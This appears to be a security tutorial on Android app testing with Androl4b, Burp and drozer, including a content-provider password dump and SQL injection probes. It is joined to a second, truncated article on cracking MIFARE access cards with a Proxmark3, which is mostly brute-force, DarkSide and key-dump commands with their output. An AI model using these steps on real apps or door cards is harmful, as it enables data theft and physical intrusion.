Android App Security Testing with Androl4b (Part 1)

Author: 雪碧0xroot @ 漏洞盒子安全团队

Originally published at:

http://www.freebuf.com/articles/terminal/110374.html

0x00 Introduction

When testing mobile client apps, I believe many of you install the app under test on the phone you use every day. This is a common approach, but a daily-use phone inevitably has other, unrelated apps running in the background and making network requests, so we intercept many packets the test does not need, and sometimes we cannot even tell whether a packet was sent by the app under test. Given this, we need a cleaner test environment for mobile app testing.

0x01 To Do a Good Job, First Sharpen Your Tools

Androl4b is an Ubuntu MATE based system for Android security assessment and testing. It integrates a set of tools needed to assess Android applications, usable for reverse engineering and malware analysis, and saves Android testers and security researchers a great deal of the time and effort that environment setup normally takes.

For a Chinese-language introduction to the tool, see the article 工具推荐:Androl4b,安卓安全评估测试利器.

Download link: http://pan.baidu.com/s/1dEfkwLV  Extraction password: 57gu

MD5Sum : 0c2346b1dbd769e3eb2069026a3c8efe
SHA1Sum : 1119e5e225094191739281670e2aa6400a15f80f

0x02 System Tweaks

Once downloaded and extracted, Androl4b can be booted directly in a virtual machine:

Account: andro

Password: androlab

The system already integrates a JDK, Android Studio, Python, Wireshark, Burp Suite and other common tools. Because the image was packaged by a non-Chinese author, no Chinese language support is installed.

2.1 Configure DNS

System->Control Center->Network->DNS:

sudo apt-get update

2.2 Install the Chinese language pack

System->Control Center->Language Support->Install/Remove Languages->Chinese (simplified)

Click Apply Changes to make the setting take effect; after the account password is entered, the language files start downloading:

When the download finishes, drag Chinese to the top of the list (above English) to make Chinese the preferred system language. The setting takes effect after a reboot. Alternatively, follow the steps below to edit the system configuration files and make Chinese the preferred language:

2.3 Edit the system locale configuration files

Edit the local file:

sudo vim /var/lib/locales/supported.d/local
// delete all existing content and add the following:
zh_CN.UTF-8 UTF-8
zh_CN GB2312
zh_CN.GBK GBK
en_US.UTF-8 UTF-8
fr_FR ISO-8859-1
zh_CN.GB18030 GB18030

Generate the locales:

sudo locale-gen --purge

Set the default language:

sudo vim /etc/default/locale
// delete all existing content and add the following:
LANG="zh_CN.UTF-8"
LANGUAGE="zh_CN:zh"
LC_NUMERIC="zh_CN.UTF-8"
LC_TIME="zh_CN.UTF-8"
LC_MONETARY="zh_CN.UTF-8"
LC_PAPER="zh_CN.UTF-8"
LC_IDENTIFICATION="zh_CN.UTF-8"
LC_NAME="zh_CN.UTF-8"
LC_ADDRESS="zh_CN.UTF-8"
LC_TELEPHONE="zh_CN.UTF-8"
LC_MEASUREMENT="zh_CN.UTF-8"

Reboot after making the changes. The end result:

0x03 Android Emulator

Emulator, the Android emulator, is currently the most convenient Android emulator to use: there are no plugins to install, just download, install and run it. It supports Windows and Linux. Androl4b ships with it preinstalled and has a virtual Android device named lab:

3.1 Set a proxy for the virtual device

Run in a terminal:

emulator -avd lab -no-audio -http-proxy http://127.0.0.1:8090

3.2 Configure Burp Suite

3.2.1 Add a proxy listener

Applications->tools->BurpSuite  Proxy->Option-add->Bind to port 8090

3.2.2 Listen on 127.0.0.1:8090

Open a website in the emulator's built-in browser to test whether the network requests are intercepted:

Burp Suite successfully intercepts the network requests from the Android emulator.

0x04 Some ADB Usage

4.1 List all Android platform targets on the system

android list targets

4.2 List the devices connected to the computer

adb devices

The emulator-5554 device is the Android phone simulated by the emulator; LGD857 is my own phone connected to the computer.

4.3 Install an application

adb install xxx.apk

4.3.1 Intercept the app's network traffic:

4.4 Pull a file from the emulator:

adb pull  

4.5 Push a file to the emulator:

adb push  

4.6 Enter the emulator's shell:

adb shell

4.7 Uninstall an app from the emulator

adb uninstall com.sina.weibo

0x05 Drozer

5.1 About the tool

Drozer, originally named Mercury, is an Android security auditing and attack framework. It comes in a free (community) edition and a professional edition; the professional edition adds features such as a GUI.

5.2 Tool sites

Tool description and download: https://labs.mwrinfosecurity.com/tools/drozer/

Open-source project on GitHub: https://github.com/mwrlabs/drozer/

5.3 Installation

Androl4b already includes the tool; run it in a terminal and look at the help output:

andro@l4b:~$ drozer
usage: drozer [COMMAND]

Run `drozer [COMMAND] --help` for more usage information.

Commands:
          console  start the drozer Console
           module  manage drozer modules
           server  start a drozer Server
              ssl  manage drozer SSL key material
          exploit  generate an exploit to deploy drozer
            agent  create custom drozer Agents
          payload  generate payloads to deploy drozer
andro@l4b:~$ drozer console --help
usage: drozer console [OPTIONS] COMMAND

Starts a new drozer Console to interact with an Agent.

The drozer Console connects to an Agent and allows you to interact with the
system from the context of the agent application on the device. The console
can connect directly to an agent, if its embedded server is enabled, or through
a drozer Server that the agent is connected to.

positional arguments:
  command               the command to execute
  device                the unique identifier of the Agent to connect to

optional arguments:
  -h, --help            show this help message and exit
  --server HOST[:PORT]  specify the address and port of the drozer server
  --ssl                 connect with SSL
  --accept-certificate  accept any SSL certificate with a valid trust chain
  --debug               enable debug mode
  --no-color            disable syntax highlighting in drozer output
  --password            the agent requires a password
  -c ONECMD, --command ONECMD
                        specify a single command to run in the session
  -f [FILE [FILE ...]], --file [FILE [FILE ...]]
                        source file

available commands:
  commands    shows a list of all console commands                              
  connect     starts a new session with a device                                
  devices     lists all devices bound to the drozer server                      
  disconnect  disconnects a drozer session                                      
  version     display the installed drozer version  

Next we need to install the Drozer agent in the emulator.

5.3.1 Start the Android emulator (Terminal ①):

emulator -avd lab

5.3.2 Download the Drozer agent APK (Terminal ②):

wget https://labs.mwrinfosecurity.com/system/assets/934/original/drozer-agent-2.3.4.apk

5.3.3 Install the Drozer agent into the Android emulator:

adb install drozer-agent-2.3.4.apk

5.4 Getting started

5.4.1 Run the drozer Agent app in the Android emulator and switch on the Embedded Server:

5.4.2 Use adb to forward port 31415, the port Drozer uses, then open the Drozer console:

adb forward tcp:31415 tcp:31415
drozer console connect

run $module    run a Drozer module
list       list all Drozer modules
dz> list
app.activity.forintent      Find activities that can handle the given intent    
app.activity.info           Gets information about exported activities.         
app.activity.start          Start an Activity                                   
app.broadcast.info          Get information about broadcast receivers           
app.broadcast.send          Send broadcast using an intent                      
app.broadcast.sniff         Register a broadcast receiver that can sniff        
                            particular intents                                  
app.package.attacksurface   Get attack surface of package                       
app.package.backup          Lists packages that use the backup API (returns true
                            on FLAG_ALLOW_BACKUP)                               
app.package.debuggable      Find debuggable packages                            
app.package.info            Get information about installed packages            
app.package.launchintent    Get launch intent of package                        
app.package.list            List Packages                                       
app.package.manifest        Get AndroidManifest.xml of package                  
app.package.native          Find Native libraries embedded in the application.  
app.package.shareduid       Look for packages with shared UIDs                  
app.provider.columns        List columns in content provider                    
app.provider.delete         Delete from a content provider                      
app.provider.download       Download a file from a content provider that        
                            supports files                                      
app.provider.finduri        Find referenced content URIs in a package           
app.provider.info           Get information about exported content providers    
app.provider.insert         Insert into a Content Provider                      
app.provider.query          Query a content provider                            
app.provider.read           Read from a content provider that supports files    
app.provider.update         Update a record in a content provider               
app.service.info            Get information about exported services             
app.service.send            Send a Message to a service, and display the reply  
app.service.start           Start Service                                       
app.service.stop            Stop Service                                        
auxiliary.webcontentresolver
                            Start a web service interface to content providers. 
exploit.jdwp.check          Open @jdwp-control and see which apps connect       
exploit.pilfer.general.apnprovider
                            Reads APN content provider                          
exploit.pilfer.general.settingsprovider
                            Reads Settings content provider                     
information.datetime        Print Date/Time                                     
information.deviceinfo      Get verbose device information                      
information.permissions     Get a list of all permissions used by packages on   
                            the device                                          
scanner.activity.browsable  Get all BROWSABLE activities that can be invoked    
                            from the web browser                                
scanner.misc.native         Find native components included in packages         
scanner.misc.readablefiles  Find world-readable files in the given folder       
scanner.misc.secretcodes    Search for secret codes that can be used from the   
                            dialer                                              
scanner.misc.sflagbinaries  Find suid/sgid binaries in the given folder (default
                            is /system).                                        
scanner.misc.writablefiles  Find world-writable files in the given folder       
scanner.provider.finduris   Search for content providers that can be queried    
                            from our context.                                   
scanner.provider.injection  Test content providers for SQL injection            
                            vulnerabilities.                                    
scanner.provider.sqltables  Find tables accessible through SQL injection        
                            vulnerabilities.                                    
scanner.provider.traversal  Test content providers for basic directory traversal
                            vulnerabilities.                                    
shell.exec                  Execute a single Linux command.                     
shell.send                  Send an ASH shell to a remote listener.             
shell.start                 Enter into an interactive Linux shell.              
tools.file.download         Download a File                                     
tools.file.md5sum           Get md5 Checksum of file                            
tools.file.size             Get size of file                                    
tools.file.upload           Upload a File                                       
tools.setup.busybox         Install Busybox.                                    
tools.setup.minimalsu       Prepare 'minimal-su' binary installation on the     
                            device. 
shell    enter the interactive shell of the Drozer Agent app
 dz> shell
u0_a343@g3:/data/data/com.mwr.dz $ 

5.5 Tool features

5.5.1 List all app packages installed on the emulator device

run app.package.list

5.5.2 Enumerate an app's details:

In the first part of this article we installed Sina Weibo, so Weibo serves as the example here:

Search with the keyword "weibo" to find the package name:

dz> run app.package.list -f weibo
com.sina.weibo (微博)
dz> 

View the package information:

run app.package.info -a  com.sina.weibo

With the above we have obtained the application's data directory, APK path, UID, GID and other information.

5.5.3 Analyze the app's attack surface & look for IPC vulnerabilities:

dz> run app.package.attacksurface com.sina.weibo
Attack Surface:
  139 activities exported
  21 broadcast receivers exported
  1 content providers exported
  16 services exported

Weibo has 139 exported activities; we can list the app's activities with the following command:

5.5.4 Get activity information

dz> run app.activity.info -a com.sina.weibo
Package: com.sina.weibo
  com.sina.weibo.MainTabActivity
    Permission: null
  com.sina.weibo.composerinde.ComposerDispatchActivity
    Permission: null
.................. (a number of entries omitted) ........................
  com.sina.weibo.richdocument.RichDocumentDispatchActivity
    Permission: null
  com.sina.weibo.notepro.NoteActivity
    Permission: null

dz>

5.5.5 Reading from Content Providers

dz> run app.provider.info -a com.sina.weibo
Package: com.sina.weibo
  Authority: com.sina.weibo.sdkProvider
    Read Permission: null
    Write Permission: null
    Content Provider: com.sina.weibo.provider.SinaWeiboSdkProvider
    Multiprocess Allowed: False
    Grant Uri Permissions: False

5.5.6 Database-backed Content Providers (Data Leakage)

While testing for this article I could not find a suitable app to demonstrate the data-leakage module and the SQL-injection module, so I reproduce the examples from the user guide directly:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

Exploiting it:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
email: incognitoguy50@gmail.com

5.5.7 Database-backed Content Providers (SQL Injection)

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
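
The two probes above fail because the provider pastes the caller-supplied projection and selection straight into its SQL. The following Python sketch is added here as an example (it is not the article's code and not drozer's or Sieve's): it reproduces that query builder against an in-memory SQLite table holding a constructed row modelled on the Passwords output above, next to a hardened version that allow-lists columns and binds the filter value as a parameter. The Android APIs named in the comments (SQLiteQueryBuilder.setProjectionMap, setStrictMode, selectionArgs) are the real counterparts; the more fundamental fix, as app.provider.info shows with "Read Permission: null", is not to export the provider without a permission.

```python
import sqlite3

# Constructed sample row mirroring the Sieve "Passwords" output shown above.
SAMPLE_ROWS = [
    (1, "Email", "incognitoguy50", "PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==", "incognitoguy50@gmail.com"),
]
ALLOWED_COLUMNS = ("_id", "service", "username", "password", "email")


def make_db():
    """In-memory stand-in for the provider's SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, "
                 "username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO Passwords VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def naive_query(conn, projection=None, selection=None, selection_args=()):
    """What a careless ContentProvider.query() effectively does: the caller's projection and
    selection strings are concatenated into the statement, which is exactly what the drozer
    errors above reveal ("SELECT ' FROM Passwords", "... WHERE (')")."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % cols
    if selection:
        sql += " WHERE (%s)" % selection
    return conn.execute(sql, selection_args).fetchall()


def hardened_query(conn, projection=None, service=None):
    """Same query with two fixes: every requested column must be on an allow-list
    (Android: SQLiteQueryBuilder.setProjectionMap + setStrictMode), and the only filter is a
    fixed column compared against a bound parameter (Android: selectionArgs)."""
    cols = projection or ALLOWED_COLUMNS
    for col in cols:
        if col not in ALLOWED_COLUMNS:
            raise ValueError("%r is not a permitted column" % col)
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    args = ()
    if service is not None:
        sql += " WHERE service = ?"
        args = (service,)
    return conn.execute(sql, args).fetchall()


def probe(query_fn, conn, **kwargs):
    """Runs a query and reports ('ok', rows) or ('error', message) so both
    implementations can be compared on the same inputs."""
    try:
        return "ok", query_fn(conn, **kwargs)
    except (sqlite3.OperationalError, ValueError) as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    print("naive, --projection \"'\":  ", probe(naive_query, db, projection=["'"]))
    print("naive, --selection \"'\":   ", probe(naive_query, db, selection="'"))
    print("naive, selection 1=1:      ", probe(naive_query, db, selection="1=1"))
    print("hardened, --projection \"'\":", probe(hardened_query, db, projection=["'"]))
    print("hardened, injected service:", probe(hardened_query, db, service="' OR 1=1 --"))
```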

Drozer User Guide

For more Drozer features and usage, see the Drozer User Guide: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

0x06 ApkTool

6.1 About the tool

ApkTool is an APK (de)compilation tool provided by Google; it supports decompiling and rebuilding APKs, can install the framework-res framework required to decompile system APKs, clean up the previous decompilation directory, and so on. Java must be installed to use it.

6.2 decode

The decode command decompiles an APK file:

apktool decode xx.apk

When decompilation finishes we see a "weibo" directory containing an AndroidManifest.xml file:

By analyzing AndroidManifest.xml we can obtain information such as the package name, version information and Activity components:

Within the tags we can find all of the activities:
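
The drozer modules used in 5.5.3 and 5.5.4 (app.package.attacksurface, app.activity.info) report exported components and their permissions at runtime; the same facts can be computed offline from the decoded AndroidManifest.xml. The following Python script is added here as an example (it is not the article's code, nor apktool's or drozer's): it applies Android's export rules (an explicit android:exported wins; otherwise an intent-filter exports the component, and providers were exported by default before API 17) to a constructed sample manifest in the layout apktool produces, and lists the exported components that demand no permission, which is what drozer prints as "Permission: null".

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest in the shape apktool decode produces (not from any real app).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app" android:versionCode="42" android:versionName="1.2.0">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="23"/>
  <application android:debuggable="true">
    <activity android:name=".MainTabActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".ComposerDispatchActivity" android:exported="true"/>
    <activity android:name=".InternalActivity" android:exported="false"/>
    <activity android:name=".SettingsActivity"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <provider android:name=".provider.SdkProvider" android:authorities="com.example.app.sdk"
              android:exported="true"/>
    <provider android:name=".provider.PrivateProvider" android:authorities="com.example.app.private"
              android:exported="true" android:permission="com.example.app.PRIVATE"/>
    <provider android:name=".provider.LocalProvider" android:authorities="com.example.app.local"/>
    <service android:name=".PushService" android:exported="true" android:permission="com.example.app.PUSH"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Reads an android: namespaced attribute, or None when it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(comp, target_sdk):
    """Android's rule: explicit android:exported wins; otherwise a component with an
    intent-filter is exported, and providers were exported by default before API 17."""
    explicit = attr(comp, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if comp.tag == "provider":
        return target_sdk < 17
    return comp.find("intent-filter") is not None


def is_protected(comp):
    """True when the component demands a permission from its callers."""
    if attr(comp, "permission") is not None:
        return True
    return comp.tag == "provider" and (
        attr(comp, "readPermission") is not None or attr(comp, "writePermission") is not None)


def attack_surface(manifest_xml):
    """Counts exported components per type (like app.package.attacksurface) and lists
    the exported ones without any permission (drozer's 'Permission: null')."""
    root = ET.fromstring(manifest_xml.strip())
    pkg = root.get("package")
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    app = root.find("application")
    report = {
        "package": pkg,
        "versionName": attr(root, "versionName"),
        "debuggable": attr(app, "debuggable") == "true",     # cf. app.package.debuggable
        "allowBackup": attr(app, "allowBackup") != "false",  # default is true; cf. app.package.backup
        "exported": {},
        "unprotected": [],
    }
    for kind in ("activity", "receiver", "provider", "service"):
        exported = []
        for comp in app.findall(kind):
            if not is_exported(comp, target_sdk):
                continue
            name = attr(comp, "name")
            if name.startswith("."):          # shorthand relative to the package name
                name = pkg + name
            exported.append(name)
            if not is_protected(comp):
                report["unprotected"].append((kind, name))
        report["exported"][kind] = exported
    return report


if __name__ == "__main__":
    r = attack_surface(SAMPLE_MANIFEST)
    print("Package:", r["package"], r["versionName"],
          "debuggable=%s allowBackup=%s" % (r["debuggable"], r["allowBackup"]))
    print("Attack Surface:")
    for kind, names in r["exported"].items():
        print("  %d %s exported" % (len(names), kind))
    for kind, name in r["unprotected"]:
        print("  unprotected %s: %s" % (kind, name))
```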

0x07 References

https://blogs.mcafee.com/mcafee-labs/testing-android-application-security-part-1/

https://github.com/sh4hin/Androl4b

工具推荐:Androl4b,安卓安全评估测试利器

Drozer User Guide: https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

blogs.mcafee.com : How to: Testing Android Application Security, Part 2

maxwithcoco.com : drozer:某APK ContentProvider安全测试

*Author: 雪碧0xroot@漏洞盒子安全团队. Reposts must credit FreeBuf黑客与极客 (FreeBuf.COM).

RFID Hacking ④: Cracking Access Control with ProxMark3

Some of the techniques mentioned in this article may be offensive in nature and are provided only for security study and teaching; illegal use is prohibited!

0x00 Introduction

One of the traditions of the international hacker conference Defcon is lockpicking, because hackers see locks as a security challenge too. In hacker-themed films and TV series we often see the protagonists use superb hacking skills to break into a target company's network, or even use social engineering to get past access control, sneak into the target's offices and carry out a physical attack as if nobody were there. (Agents of S.H.I.E.L.D., Mr. Robot and Who Am I all seem to have such scenes.)

北上广不相信眼泪, episode 16

Against this background we cannot help but wonder: the access control system is an enterprise's first physical barrier, so has the security of this hardware infrastructure been overlooked all along?

0x01 Preparation

For setting up the environment on Linux and Windows, see the article RFID Hacking②:PM3入门指南.

1.1 Enter the PM3 client terminal

./proxmark3 /dev/ttyACM0

1.2 Test the antennas

proxmark3> hw tune

# LF antenna: 29.98 V @   125.00 kHz          
# LF antenna: 30.39 V @   134.00 kHz          
# LF optimal: 36.30 V @   129.03 kHz          
# HF antenna: 27.90 V @    13.56 MHz          
proxmark3> 

1.3 Device firmware

proxmark3> hw ver
#db# Prox/RFID mark3 RFID instrument                 
#db# bootrom: /-suspect 2015-04-02 15:12:04                 
#db# os: /-suspect 2015-04-02 15:12:11                 
#db# HF FPGA image built on 2015/03/09 at 08:41:42    

0x02 Brute-forcing & Enumerating Keys

2.1 Read the card

proxmark3> hf 14a reader
ATQA : 04 00          
 UID : 2c f0 55 0b           
 SAK : 08 [2]          
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1          
proprietary non iso14443a-4 card found, RATS not supported 

2.2 Run the NESTED attack to enumerate & brute-force the keys:

proxmark3> hf mf chk *1 ? t
No key specified,try default keys          
chk default key[0] ffffffffffff          
chk default key[1] 000000000000          
chk default key[2] a0a1a2a3a4a5          
chk default key[3] b0b1b2b3b4b5          
chk default key[4] aabbccddeeff          
chk default key[5] 4d3a99c351dd          
chk default key[6] 1a982c7e459a          
chk default key[7] d3f7d3f7d3f7          
chk default key[8] 714c5c886e97          
chk default key[9] 587ee5f9350f          
chk default key[10] a0478cc39091          
chk default key[11] 533cb6c723f6          
chk default key[12] 8fd0a4f256e9          
--SectorsCnt:0 block no:0x03 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:1 block no:0x07 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:2 block no:0x0b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:3 block no:0x0f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:4 block no:0x13 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:5 block no:0x17 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:6 block no:0x1b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:7 block no:0x1f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:8 block no:0x23 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:9 block no:0x27 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:10 block no:0x2b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:11 block no:0x2f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:12 block no:0x33 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:13 block no:0x37 key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:14 block no:0x3b key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:15 block no:0x3f key type:A key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:0 block no:0x03 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:1 block no:0x07 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:2 block no:0x0b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:3 block no:0x0f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:4 block no:0x13 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:5 block no:0x17 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:6 block no:0x1b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:7 block no:0x1f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:8 block no:0x23 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:9 block no:0x27 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:10 block no:0x2b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:11 block no:0x2f key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:12 block no:0x33 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:13 block no:0x37 key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:14 block no:0x3b key type:B key count:13           
Found valid key:[ffffffffffff]          
--SectorsCnt:15 block no:0x3f key type:B key count:13           
Found valid key:[ffffffffffff]          
proxmark3> 

The card keys were recovered successfully.

2.3 Exploit the PRNG weakness with the MIFARE "DarkSide" attack

proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average  :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(090a070d060b0501) nr(00000000)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000000| 9 |  c  |0,0,0,0,0,0,0,0|
| 20 |00000020| a |  f  |0,0,0,0,0,0,0,0|
| 40 |00000040| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000060| d |  8  |0,0,0,0,0,0,0,0|
| 80 |00000080| 6 |  3  |0,0,0,0,0,0,0,0|
| a0 |000000a0| b |  e  |0,0,0,0,0,0,0,0|
| c0 |000000c0| 5 |  0  |0,0,0,0,0,0,0,0|
| e0 |000000e0| 1 |  4  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8          
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d0407030d070c04) nr(00000001)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000001| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000021| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000041| 7 |  2  |0,0,0,0,0,0,0,0|
| 60 |00000061| 3 |  6  |0,0,0,0,0,0,0,0|
| 80 |00000081| d |  8  |0,0,0,0,0,0,0,0|
| a0 |000000a1| 7 |  2  |0,0,0,0,0,0,0,0|
| c0 |000000c1| c |  9  |0,0,0,0,0,0,0,0|
| e0 |000000e1| 4 |  1  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8          
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce...          

uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d040e0e0c010e00) nr(00000002)

|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000002| d |  8  |0,0,0,0,0,0,0,0|
| 20 |00000022| 4 |  1  |0,0,0,0,0,0,0,0|
| 40 |00000042| e |  b  |0,0,0,0,0,0,0,0|
| 60 |00000062| e |  b  |0,0,0,0,0,0,0,0|
| 80 |00000082| c |  9  |0,0,0,0,0,0,0,0|
| a0 |000000a2| 1 |  4  |0,0,0,0,0,0,0,0|
| c0 |000000c2| e |  b  |0,0,0,0,0,0,0,0|
| e0 |000000e2| 0 |  5  |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...          
p1:0 p2:0 p3:0 key:ffffffffffff
p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9
p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea
p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de
p1:3de0e p2:24775 p3:4 key:968a7a09c714
p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed
p1:54f81 p2:32426 p3:6 key:6ecaf371a99d
p1:58b75 p2:34777 p3:7 key:6860b744915b
p1:616dd p2:3998a p3:8 key:59747d7fdf41
p1:63400 p2:3ab54 p3:9 key:56476bbef406
p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91
p1:6dc19 p2:40e78 p3:b key:44554ae362a1
p1:708f8 p2:42956 p3:c key:3f83eb143dd6
p1:7abf0 p2:48987 p3:d key:2e2b8565f96b
p1:7b298 p2:48d82 p3:e key:2d70e3e38553
p1:8420b p2:4e219 p3:f key:1e238b63e204
p1:8ce60 p2:53484 p3:10 key:0f4b7cb380a5
key_count:17
------------------------------------------------------------------
Key found:ffffffffffff 

Found valid key:ffffffffffff          
proxmark3> 

This method can also recover the card's key, but it often comes down to luck, because not every card has this weakness. If the card has no PRNG weakness, we have to sniff the traffic between the card and the reader and derive the key from it.

For using the PM3 as a man-in-the-middle to sniff traffic, see 【RFID Hacking③】ProxMark3使用案例:嗅探银行闪付卡信息, and the RadioWar team's 利用Proxmark3监听M1卡交互过程,算出某一区的key.

0x03 Dumping Card Data & Processing It

With the methods above we have recovered the card keys; next we can use them to export all of the card's data (dumpdata):

proxmark3> hf mf nested 1 0 A ffffffffffff d 
--block no:00 key type:00 key:ff ff ff ff ff ff  etrans:0          
Block shift=0          
Testing known keys. Sector count=16          
nested...          
Time in nested: 0.030 (inf sec per key)

-----------------------------------------------
Iterations count: 0

|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|003|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|009|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...          
proxmark3> 

During this step a dumpkeys.bin file is written to the PM3's current working directory:

Next, running hf mf dump retrieves the entire card's data:

proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
Command execute timeout          
Sending bytes to proxmark failed          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
